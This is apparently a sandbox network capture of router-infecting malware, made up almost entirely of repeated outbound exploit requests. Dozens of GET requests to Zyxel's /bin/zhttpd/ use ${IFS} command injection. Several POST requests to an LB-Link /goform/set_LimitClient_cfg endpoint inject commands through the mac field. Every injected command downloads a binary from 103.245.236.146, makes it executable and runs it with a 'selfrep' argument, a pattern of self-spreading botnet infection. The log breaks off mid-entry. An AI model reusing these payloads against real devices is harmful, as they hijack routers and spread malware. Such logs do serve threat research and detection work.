                                                        Jan 28, 2024 10:12:40.157006025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1348192.168.2.1434434132.70.200.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157037020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1349192.168.2.1457770184.238.111.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157100916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1350192.168.2.143300464.198.74.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157114029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1351192.168.2.1441574169.218.34.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157166958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1352192.168.2.145027263.133.95.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157185078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1353192.168.2.1459958170.173.180.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157238960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1354192.168.2.1459794211.153.46.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157283068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1355192.168.2.143567885.151.60.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157310963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1356192.168.2.145561284.250.170.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157357931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1357192.168.2.1432980104.73.81.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157376051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1358192.168.2.1434306159.47.88.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157423973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1359192.168.2.1440366141.124.27.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157481909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1360192.168.2.1445494122.56.142.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157519102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1361192.168.2.14525142.142.4.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157530069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1362192.168.2.143991034.198.113.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157557964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1363192.168.2.1449786151.177.2.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157605886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1364192.168.2.1447566143.22.54.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157650948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1365192.168.2.1437364188.250.86.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157685995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1366192.168.2.1443310120.48.98.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157726049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1367192.168.2.145753613.199.40.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157757044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1368192.168.2.1459640147.144.107.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157799959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1369192.168.2.1441266145.83.76.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157834053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1370192.168.2.143881273.190.225.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157900095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1371192.168.2.1451394195.57.69.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157922029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1372192.168.2.143627071.167.114.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.157958031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1373192.168.2.1436512184.111.31.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158010960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1374192.168.2.1438548114.152.43.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158068895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1375192.168.2.1445680179.174.153.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158072948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1376192.168.2.1455720106.169.98.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158104897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1377192.168.2.145896888.179.104.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158147097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1378192.168.2.1460838218.183.182.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158164978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1379192.168.2.1440220109.177.23.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158221006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1380192.168.2.1460512155.199.234.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158257008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1381192.168.2.145604263.158.10.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158286095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1382192.168.2.144372435.180.106.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158324003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1383192.168.2.1444736196.47.32.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158354044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1384192.168.2.143392699.83.216.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158375978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1385192.168.2.1454200147.113.246.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158411980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1386192.168.2.143623245.234.129.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158550024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1387192.168.2.1458220128.15.195.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158601046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1388192.168.2.1451604119.249.127.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158642054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1389192.168.2.143692267.121.81.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158667088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1390192.168.2.1456244140.111.1.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158713102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1391192.168.2.14510101.29.234.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158771038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1392192.168.2.144222235.66.148.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.158796072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1393192.168.2.145340431.136.0.2528080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.533819914 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:41.166412115 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:42.446542978 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:45.166249990 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:50.286106110 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:13:00.525661945 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1394192.168.2.1434370138.36.244.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.560950041 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
